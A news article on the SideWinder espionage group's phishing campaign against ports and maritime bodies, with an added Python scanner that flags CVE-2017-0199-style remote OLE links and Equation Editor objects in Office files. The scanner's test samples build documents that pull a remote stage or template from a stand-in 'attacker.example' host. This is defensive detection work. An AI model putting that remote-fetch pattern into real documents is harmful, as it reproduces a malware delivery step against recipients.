Hackers Target Maritime Facilities With Malware
Researchers have uncovered a new cyber attack campaign, believed to originate from India and run by a group that has been active since 2012, which uses spear-phishing emails to deliver the malicious payloads that trigger its attack chains.
The campaign is attributed to the nation-state advanced persistent threat (APT) group known as SideWinder, which is thought to be behind an espionage campaign targeting ports and maritime facilities in the Indian Ocean and the Mediterranean.
Also known as Rattlesnake and Razor Tiger, SideWinder has been active since at least 2012, mainly targeting government, military, and businesses for the purpose of cyber espionage.
BlackBerry's Research & Intelligence Team says the spear-phishing campaign's targets are in Pakistan, Egypt, Sri Lanka, Bangladesh, Myanmar, Nepal and the Maldives, and assesses the group to be affiliated with India.
The latest set of attacks uses lure documents on topics such as sexual harassment, employee termination and salary cuts to trick recipients into opening decoy Microsoft Word documents.
Once the decoy file is opened, it exploits a known security flaw (CVE-2017-0199) to contact a malicious domain masquerading as Pakistan's Directorate General Ports and Shipping ("reports.dgps-govtpk[.]com") and retrieve a Rich Text Format (RTF) file.
The RTF file in turn downloads a document that exploits another years-old vulnerability in the Microsoft Office Equation Editor, with the goal of running shellcode that launches JavaScript code, but only after checking that the compromised system is legitimate and of interest to the threat actor.
While BlackBerry's researchers have not captured the final payload, they believe the JavaScript malware delivered by SideWinder is intended to collect intelligence and compromising material.
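The two document-level steps in that chain, a Word/RTF object that refreshes itself from a remote URL (the CVE-2017-0199 pattern) and an embedded Equation Editor object, leave structural indicators that can be checked before a file is ever opened. The script below is an added example written for this page; it is not BlackBerry's tooling or anything recovered from SideWinder. It scans constructed sample documents for those indicators. The domain `attacker.example`, the sample files and their names are invented here; the RTF control words and the Equation Editor 3.0 CLSID {0002CE02-0000-0000-C000-000000000046} are the standard ones. It also checks .docx relationship files for an external attachedTemplate or oleObject target, which goes a step beyond the RTF variant the article describes.

```python
"""Static triage for the two document tricks in the chain described above:
an RTF/Word object that auto-updates from a remote URL (CVE-2017-0199 style)
and an embedded Equation Editor object.  Added example, not BlackBerry's
tooling; every sample document below is constructed for illustration."""
import binascii
import io
import re
import xml.etree.ElementTree as ET
import zipfile

# Plain-text URL (also applied to UTF-16LE data after narrowing it to ASCII).
URL_RE = re.compile(rb"https?://[^\s\x00<>\"']{4,}", re.I)
# Hex payload of an RTF embedded/linked object: {\*\objdata 0105...}
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")
# CLSID {0002CE02-0000-0000-C000-000000000046} (Equation Editor 3.0) as it is
# laid out in an OLE stream: Data1..Data3 little-endian, Data4 big-endian.
EQUATION_CLSID = bytes.fromhex("02CE0200" "0000" "0000" "C000000000000046")
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Relationship types that fetch content from outside the package on open.
# Ordinary hyperlinks are also TargetMode="External" and are skipped on purpose.
REMOTE_REL_TYPES = {"attachedTemplate", "oleObject"}


def _objdata_blobs(rtf: bytes):
    """Yield the decoded binary of every \\objdata group in an RTF file."""
    for m in OBJDATA_RE.finditer(rtf):
        hexstr = re.sub(rb"\s+", b"", m.group(1))
        if len(hexstr) % 2:          # tolerate a truncated trailing nibble
            hexstr = hexstr[:-1]
        try:
            yield binascii.unhexlify(hexstr)
        except binascii.Error:
            continue


def _urls_in(blob: bytes) -> list[str]:
    """URLs present as ASCII or as UTF-16LE (how OLE monikers store them)."""
    found = {u.decode("latin-1") for u in URL_RE.findall(blob)}
    wide = blob.decode("utf-16le", errors="ignore").encode("latin-1", errors="ignore")
    found.update(u.decode("latin-1") for u in URL_RE.findall(wide))
    return sorted(found)


def scan_rtf(rtf: bytes) -> list[str]:
    findings = []
    # \objupdate / \objautlink make Word refresh the linked object on open,
    # which is what turns a URL inside \objdata into an automatic download.
    auto_refresh = re.search(rb"\\obj(update|autlink)", rtf) is not None
    for blob in _objdata_blobs(rtf):
        urls = _urls_in(blob)
        if urls and (auto_refresh or b"OLE2Link" in blob):
            findings.append("CVE-2017-0199-style remote OLE link: " + ", ".join(urls))
        if EQUATION_CLSID in blob:
            findings.append("Equation Editor CLSID inside embedded OLE object")
    if re.search(rb"\\objclass\s+Equation\.3", rtf, re.I):
        findings.append("objclass Equation.3 (Equation Editor object)")
    return findings


def scan_docx(data: bytes) -> list[str]:
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(z.read(name))
            except ET.ParseError:
                continue
            for rel in root.iter(REL_NS + "Relationship"):
                kind = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                if (rel.get("TargetMode") == "External" and kind in REMOTE_REL_TYPES
                        and URL_RE.match(target.encode("latin-1", "ignore"))):
                    findings.append(f"external {kind} in {name}: {target}")
    return findings


def scan(data: bytes) -> list[str]:
    """Dispatch on container magic. Legacy OLE2 .doc files are not handled."""
    if data.startswith(b"{\\rtf"):
        return scan_rtf(data)
    if data.startswith(b"PK\x03\x04"):
        return scan_docx(data)
    return ["unsupported container: not scanned"]


def build_samples() -> dict[str, bytes]:
    """Constructed, structurally representative samples (not real malware)."""
    link = b"OLE2Link" + "http://attacker.example/stage2.rtf".encode("utf-16le")
    stage1 = (b"{\\rtf1{\\object\\objautlink\\objupdate{\\*\\objclass Word.Document.8}"
              b"{\\*\\objdata " + binascii.hexlify(link) + b"}}}")
    eqn = b"\x01\x05\x00\x00\x02\x00\x00\x00" + EQUATION_CLSID + b"\x00" * 16
    stage2 = (b"{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}"
              b"{\\*\\objdata " + binascii.hexlify(eqn) + b"}}}")
    benign = b"{\\rtf1\\ansi Notice of salary revision.\\par}"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/settings.xml.rels",
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" TargetMode="External" Target="http://attacker.example/t.dotm" '
            'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"/>'
            '<Relationship Id="rId2" TargetMode="External" Target="https://example.org/" '
            'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/>'
            "</Relationships>")
    return {"stage1.rtf": stage1, "stage2.rtf": stage2,
            "benign.rtf": benign, "decoy.docx": buf.getvalue()}


if __name__ == "__main__":
    for name, data in build_samples().items():
        print(name, "->", scan(data) or "clean")
```

Run it against quarantined attachments, not a live mailbox. The checks are triage heuristics: a URL inside an auto-refreshing object and an Equation Editor class identifier are strong signals, but the script does not unpack legacy OLE2 .doc containers and a clean result is not proof that a file is benign.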
BlackBerry | Hacker News | Security Week | Dark Reading | Cyber Express | Security Affairs
Image: Ideogram